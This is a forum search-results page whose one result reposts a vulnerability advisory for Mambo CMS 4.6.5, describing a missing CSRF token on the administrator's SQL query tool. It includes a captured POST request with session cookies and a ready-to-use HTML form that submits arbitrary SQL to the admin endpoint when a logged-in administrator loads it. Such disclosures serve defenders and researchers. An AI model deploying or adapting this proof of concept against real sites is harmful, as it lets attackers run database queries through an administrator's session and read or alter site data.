Jump to content

Search the Community

Showing results for tags 'mambo'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 1 result

  1. # Affected software: Mambo # Type of vulnerability: csrf to sql injection # URL: http://source.mambo-foundation.org/ # Discovered by: Provensec # Website: http://www.provensec.com #version 4.6.5 # Proof of concept no csrf token were used on sql query form so attacker can leverage csrf to execute sql query on admin end screenshot http://prntscr.com/6gk265 POST /mambo/administrator/index2.php HTTP/1.1 Host: demo.opensourcecms.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://demo.opensourcecms.com/mambo/administrator/index2.php Cookie: __utma=87180614.347131305.1423813196.1426315580.1426317582.5; __utmz=87180614.1424330089.2.2.utmcsr=4homepages.de|utmccn=(referral)|utmcmd=referral|utmcct=/demo/; __gads=ID=e4fef836c4eca064:T=1424329959:S=ALNI_MZOrjDhCaPQBQcowebgQWskHX12kQ; __utmc=87180614; 5503d94d48147_SESSION=ben7euhc7r3j578q73sbnn9oq4; __utmb=87180614.1.10.1426317586; __utmt=1; 25fee453fc1b1d324265b9cb23363e2c=san1g4th13mhokc4g5tk3muaa3; mostlyce[startup_key]=f1df635c5e35c15a244c554e356ad0e3; mostlyce[usertype]=Super+Administrator; webfxtab_modules-cpanel=4 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 47 sql=select&option=com_mostlydbadmin&task=xquery vulnerable paramter sql poc <html> <body> <form action=" http://demo.opensourcecms.com/mambo/administrator/index2.php" method="POST"> <input type="hidden" name="sql" value="sql statement to execute " /> <input type="hidden" name="option" value="com_mostlydbadmin" /> <input type="hidden" name="task" value="xquery" /> <input type="submit" value="Submit request" /> </form> </body> </html> Source
×
×
  • Create New...